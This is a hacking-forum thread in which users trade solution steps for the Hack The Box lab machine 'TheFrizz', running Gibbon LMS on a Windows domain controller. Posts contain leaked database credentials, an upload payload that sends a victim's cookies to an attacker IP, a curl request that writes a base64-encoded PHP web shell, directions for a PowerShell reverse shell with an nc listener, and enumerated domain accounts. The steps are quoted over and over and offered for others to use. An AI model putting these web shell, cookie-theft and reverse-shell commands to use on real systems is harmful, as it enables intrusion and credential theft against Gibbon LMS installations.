TheFrizz Hack the Box Season 7 (Windows Medium)
by RedBlock - Saturday March 15, 2025 at 03:36 PM
#21
$databaseServer = 'localhost';
$databaseUsername = 'MrGibbonsDB';
$databasePassword = 'MisterGibbs!Parrot!?1';
$databaseName = 'gibbon';
Reply
#22
(Mar 15, 2025, 09:01 PM)VoidNull Wrote: I got a reverse shell with this, and using the following

https://www.revshells.com/
Powershell #3 Base64 encoding

how did you manage to get shell
Reply
#23
(Mar 15, 2025, 08:42 PM)Adith19051905 Wrote: curl -X POST "http://frizzdc.frizz.htb/Gibbon-LMS/modules/Planner/resources_addQuick_ajaxProcess.php" \
-F "id=body" \
-F "bodyfile1=@file.jpg;filename=<img src=x onerror=new Image().src='http://10.10.16.16:9001?cookie='+document.cookie>.jpg" \
-F "imagesAsLinks=Y" 

uploaded the file but nothing happening.

(Mar 15, 2025, 09:04 PM)Adith19051905 Wrote:
(Mar 15, 2025, 09:01 PM)VoidNull Wrote: I got a reverse shell with this, and using the following

https://www.revshells.com/
Powershell #3 Base64 encoding

how did you manage to get shell

Upload a web shell

curl -X POST "http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php" \
-H "Host: frizzdc.frizz.htb" \
--data-urlencode "img=image/png;asdf,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4K" \
--data-urlencode "path=shell.php" \
--data-urlencode "gibbonPersonID=0000000001"

Then generate a reverse shell with your IP and PORT on revshells.com using the PowerShell #3 (base64) option.

Then go to 
http://frizzdc.frizz.htb/Gibbon-LMS/shell.php?cmd=[Insert base64 encoded reverse shell]

Remember to listen to the port you declared on revshells.com.

nc -lvnp XXX

Im running around trying to find a user flag Big Grin
Reply
#24
I tried those credentials with system users using netexec smb * but no sucess
Reply
#25
(Mar 15, 2025, 09:09 PM)adrianhack Wrote: I tried those credentials with system users using netexec smb * but no sucess

it's not a domain user + NTLM is dispaled
Reply
#26
(Mar 15, 2025, 09:07 PM)VoidNull Wrote:
(Mar 15, 2025, 08:42 PM)Adith19051905 Wrote: curl -X POST "http://frizzdc.frizz.htb/Gibbon-LMS/modules/Planner/resources_addQuick_ajaxProcess.php" \
-F "id=body" \
-F "bodyfile1=@file.jpg;filename=<img src=x onerror=new Image().src='http://10.10.16.16:9001?cookie='+document.cookie>.jpg" \
-F "imagesAsLinks=Y" 

uploaded the file but nothing happening.

(Mar 15, 2025, 09:04 PM)Adith19051905 Wrote:
(Mar 15, 2025, 09:01 PM)VoidNull Wrote: I got a reverse shell with this, and using the following

https://www.revshells.com/
Powershell #3 Base64 encoding

how did you manage to get shell

Upload a web shell

curl -X POST "http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php" \
-H "Host: frizzdc.frizz.htb" \
--data-urlencode "img=image/png;asdf,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4K" \
--data-urlencode "path=shell.php" \
--data-urlencode "gibbonPersonID=0000000001"

Then generate a reverse shell with your IP and PORT on revshells.com using the PowerShell #3 (base64) option.

Then go to 
http://frizzdc.frizz.htb/Gibbon-LMS/shell.php?cmd=[Insert base64 encoded reverse shell]

Remember to listen to the port you declared on revshells.com.

nv -lvnp XXX

Im running around trying to find a user flag Big Grin

nope doesnt work for me
Reply
#27
So, if anyone didnt get it, the host is the domain controller AFAIK.

The following users are present:

PS C:\Windows> net user
User accounts for \\FRIZZDC

-------------------------------------------------------------------------------
a.perlstein Administrator c.ramon
c.sandiego d.hudson f.frizzle
g.frizzle Guest h.arm
J.perlstein k.franklin krbtgt
l.awesome m.ramon M.SchoolBus
p.terese r.tennelli t.wright
v.frizzle w.li w.Webservice


And we might be able to leverage the following information about the Administrator

PS C:\Windows> net user Administrator
User name Administrator
Full Name
Comment Built-in account for administering the computer/domain
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 2/25/2025 2:24:10 PM
Password expires Never
Password changeable 2/25/2025 2:24:10 PM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon 3/15/2025 6:56:18 PM

Logon hours allowed All

Local Group Memberships *Administrators
Global Group memberships *Domain Admins *Domain Users
*Group Policy Creator *Schema Admins
*Enterprise Admins
The command completed successfully.
Reply
#28
Anyone managed to crack the hash of f.frizzle ?
Reply
#29
(Mar 15, 2025, 09:16 PM)kyakeiuwu Wrote:
(Mar 15, 2025, 09:07 PM)VoidNull Wrote:
(Mar 15, 2025, 08:42 PM)Adith19051905 Wrote: curl -X POST "http://frizzdc.frizz.htb/Gibbon-LMS/modules/Planner/resources_addQuick_ajaxProcess.php" \
-F "id=body" \
-F "bodyfile1=@file.jpg;filename=<img src=x onerror=new Image().src='http://10.10.16.16:9001?cookie='+document.cookie>.jpg" \
-F "imagesAsLinks=Y" 

uploaded the file but nothing happening.

(Mar 15, 2025, 09:04 PM)Adith19051905 Wrote:
(Mar 15, 2025, 09:01 PM)VoidNull Wrote: I got a reverse shell with this, and using the following

https://www.revshells.com/
Powershell #3 Base64 encoding

how did you manage to get shell

Upload a web shell

curl -X POST "http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php" \
-H "Host: frizzdc.frizz.htb" \
--data-urlencode "img=image/png;asdf,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4K" \
--data-urlencode "path=shell.php" \
--data-urlencode "gibbonPersonID=0000000001"

Then generate a reverse shell with your IP and PORT on revshells.com using the PowerShell #3 (base64) option.

Then go to 
http://frizzdc.frizz.htb/Gibbon-LMS/shell.php?cmd=[Insert base64 encoded reverse shell]

Remember to listen to the port you declared on revshells.com.

nv -lvnp XXX

Im running around trying to find a user flag Big Grin

nope doesnt work for me



try to use urlencode... Smile
Reply
#30
(Mar 15, 2025, 09:32 PM)eyalzaba Wrote:
(Mar 15, 2025, 09:16 PM)kyakeiuwu Wrote:
(Mar 15, 2025, 09:07 PM)VoidNull Wrote:
(Mar 15, 2025, 08:42 PM)Adith19051905 Wrote: curl -X POST "http://frizzdc.frizz.htb/Gibbon-LMS/modules/Planner/resources_addQuick_ajaxProcess.php" \
-F "id=body" \
-F "bodyfile1=@file.jpg;filename=<img src=x onerror=new Image().src='http://10.10.16.16:9001?cookie='+document.cookie>.jpg" \
-F "imagesAsLinks=Y" 

uploaded the file but nothing happening.

(Mar 15, 2025, 09:04 PM)Adith19051905 Wrote:
(Mar 15, 2025, 09:01 PM)VoidNull Wrote: I got a reverse shell with this, and using the following

https://www.revshells.com/
Powershell #3 Base64 encoding

how did you manage to get shell

Upload a web shell

curl -X POST "http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php" \
-H "Host: frizzdc.frizz.htb" \
--data-urlencode "img=image/png;asdf,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4K" \
--data-urlencode "path=shell.php" \
--data-urlencode "gibbonPersonID=0000000001"

Then generate a reverse shell with your IP and PORT on revshells.com using the PowerShell #3 (base64) option.

Then go to 
http://frizzdc.frizz.htb/Gibbon-LMS/shell.php?cmd=[Insert base64 encoded reverse shell]

Remember to listen to the port you declared on revshells.com.

nv -lvnp XXX

Im running around trying to find a user flag Big Grin

nope doesnt work for me



try to use urlencode... Smile

nvm that was dumb for me lol it worked
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot htb-bot 94 8,593 2 hours ago
Last Post: d39ug
  Hack the box Pro Labs, VIP, VIP+ 1 month free Method RedBlock 26 2,572 2 hours ago
Last Post: d39ug
  [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags Techtom 37 3,194 3 hours ago
Last Post: xosec
  CBBH Write Ups hiddenhacker 26 6,644 3 hours ago
Last Post: d39ug
  [FREE] HackTheBox Dante - complete writeup written by Tamarisk Tamarisk 606 94,249 3 hours ago
Last Post: Gotoschool

Forum Jump:


 Users browsing this forum: 1 Guest(s)